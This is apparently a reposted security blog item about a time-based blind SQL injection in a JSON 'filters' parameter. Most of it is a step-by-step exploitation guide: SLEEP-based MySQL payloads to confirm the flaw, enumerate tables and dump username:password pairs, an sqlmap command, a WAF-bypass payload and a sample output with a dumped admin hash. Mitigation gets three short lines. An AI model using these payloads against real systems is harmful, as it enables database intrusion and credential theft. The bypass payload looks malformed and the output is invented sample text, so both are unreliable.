Listen to this Post

Discovered a Time-Based Blind SQL Injection vulnerability in the `filters` parameter within a D JSON payload. This type of SQLi relies on delays in database responses to infer data, making it stealthier than traditional error-based SQLi.
You Should Know: Exploiting Time-Based Blind SQLi (MySQL)
1. Confirm SQL Injection with Time Delay
Use a payload that triggers a delay if the injection is successful:
' OR IF(1=1,SLEEP(5),0)-- -
If the server takes 5 seconds to respond, SQLi is confirmed.
2. Extract Database Information
Extract the database name using a conditional delay:
' OR IF(SUBSTRING(DATABASE(),1,1)='a',SLEEP(5),0)-- -
Brute-force each character by adjusting the index (1,1 → 1,2, etc.).
3. Retrieve Table Names
Check for table names with:
' OR IF(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1,1),1,1)='a',SLEEP(5),0)-- -
4. Extract Column Data
Dump sensitive data (e.g., usernames and passwords) via:
' OR IF(SUBSTRING((SELECT CONCAT(username,':',password) FROM users LIMIT 1,1),1,1)='a',SLEEP(5),0)-- -
5. Automate with SQLmap
Use SQLmap for faster exploitation:
sqlmap -u "http://target.com/api" --data='{"filters":""}' --delay=5 --time-sec=5 --technique=T --dbs
– `–technique=T` → Time-based
– `–dbs` → Extract databases
6. Bypass WAF/Filtering
Obfuscate payloads with:
'//OR//IF(1=1,SLEEP(5),0)-- -
7. Mitigation Steps
- Use Prepared Statements (Parameterized Queries).
- Implement WAF Rules blocking time-delay patterns.
- Restrict Database Permissions.
What Undercode Say
Time-Based Blind SQLi is dangerous because it evades traditional detection. Always:
– Test endpoints with time delays.
– Use SQLmap’s time-based (--technique=T) checks.
– Monitor unusual server response times.
Expected Output:
[/bash]
[+] Confirmed Time-Based SQLi: 5-second delay detected.
[+] Extracted DB Name: ‘app_db’
[+] Dumped Credentials: admin:5f4dcc3b5aa765d61d8327deb882cf99
[bash]
Prediction
As APIs grow, JSON-based SQLi will rise. Expect more WAF bypasses via obfuscation.
Relevant URL: SQLmap Cheat Sheet
IT/Security Reporter URL:
Reported By: Deepak Saini – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


